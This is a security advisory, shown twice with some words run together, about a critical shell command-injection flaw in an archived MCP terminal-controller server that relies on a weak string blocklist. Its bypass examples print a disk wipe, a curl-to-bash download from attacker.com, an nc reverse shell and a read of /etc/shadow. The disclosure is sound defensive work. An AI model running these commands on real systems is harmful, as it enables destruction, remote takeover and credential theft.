Affected Repository
https://github.com/GongRzhe/terminal-controller-mcp
Severity
CRITICAL (CVSS 9.8)
Early Publication Notice
This advisory is published early (before 90-day deadline) per responsible disclosure policy because:
- The repository is archived (since 2026-03-03) — no maintainer is actively developing patches
- The maintainer (gongrzhe@gmail.com) was notified on 2026-04-11 as a courtesy
- No patch is possible for an archived repository
- Users need immediate warning to stop using this package
Vulnerability Details
The execute_command() function in terminal_controller.py (lines 103-119) passes raw user input directly to asyncio.create_subprocess_shell(shell=True). The only protection is a naive blocklist of strings like rm -rf / and mkfs, which is trivially bypassed.
Technical Analysis
# terminal_controller.py lines 103-119 (approximate)
async def execute_command(command: str) -> str:
BLOCKLIST = ["rm -rf /", "mkfs"] # trivially bypassed
if any(blocked in command for blocked in BLOCKLIST):
return "Command blocked"
proc = await asyncio.create_subprocess_shell(
command, # raw user input passed to shell
shell=True, # critical: enables shell interpretation
...
)Bypass Examples
dd if=/dev/zero of=/dev/sda — disk wipe, not in blocklistcurl http://attacker.com/shell.sh | bash — remote code executionnc -e /bin/sh attacker.com 4444 — reverse shellcat /etc/shadow — credential theftpython3 -c "import os; os.system(open(chr(47)+tmp+chr(47)+x).read())" — indirect execution
Impact
Full RCE on the MCP server host. Any user or AI agent with access to this MCP server can execute arbitrary commands on the host system. The blocklist provides zero meaningful security.
Affected Version
All versions (repository archived, no fix will be released)
Remediation
Stop using this package immediately. The repository is archived and will not receive patches.
If you need terminal access via MCP, consider alternatives that implement proper sandboxing (containers, seccomp profiles, allowlists).
Disclosure Timeline
- 2026-04-11: Discovered during MCP security audit
- 2026-04-11: GHSA draft created, maintainer notified via email
- 2026-04-11: Early publication — repo archived, no fix possible
References
Affected Repository
https://github.com/GongRzhe/terminal-controller-mcp
Severity
CRITICAL (CVSS 9.8)
Early Publication Notice
This advisory is published early (before 90-day deadline) per responsible disclosure policy because:
Vulnerability Details
The
execute_command()function interminal_controller.py(lines 103-119) passes raw user input directly toasyncio.create_subprocess_shell(shell=True). The only protection is a naive blocklist of strings likerm -rf /andmkfs, which is trivially bypassed.Technical Analysis
Bypass Examples
dd if=/dev/zero of=/dev/sda— disk wipe, not in blocklistcurl http://attacker.com/shell.sh | bash— remote code executionnc -e /bin/sh attacker.com 4444— reverse shellcat /etc/shadow— credential theftpython3 -c "import os; os.system(open(chr(47)+tmp+chr(47)+x).read())"— indirect executionImpact
Full RCE on the MCP server host. Any user or AI agent with access to this MCP server can execute arbitrary commands on the host system. The blocklist provides zero meaningful security.
Affected Version
All versions (repository archived, no fix will be released)
Remediation
Stop using this package immediately. The repository is archived and will not receive patches.
If you need terminal access via MCP, consider alternatives that implement proper sandboxing (containers, seccomp profiles, allowlists).
Disclosure Timeline
References